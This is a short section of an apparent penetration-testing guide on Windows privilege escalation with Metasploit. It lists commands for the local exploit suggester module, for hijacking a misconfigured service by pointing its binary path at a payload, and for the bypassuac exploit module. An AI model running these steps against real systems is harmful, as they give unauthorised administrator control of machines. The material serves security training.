19. Metasploit Privilege Escalation

A. Using Exploits

Search for privilege escalation exploits:

search suggester

Run post/multi/recon/local_exploit_suggester:

use post/multi/recon/local_exploit_suggester
set SESSION <session-ID>
run

It lists possible privilege escalation exploits.

B. Exploiting Misconfigured Services

Check for weak service permissions:

sc qc <service-name>

Replace the binary path with your payload:

sc config <service-name> binPath= "C:\path\to\payload.exe"
sc start <service-name>

C. Exploiting UAC

Bypass UAC with:

use exploit/windows/local/bypassuac
set SESSION <session-ID>
run

---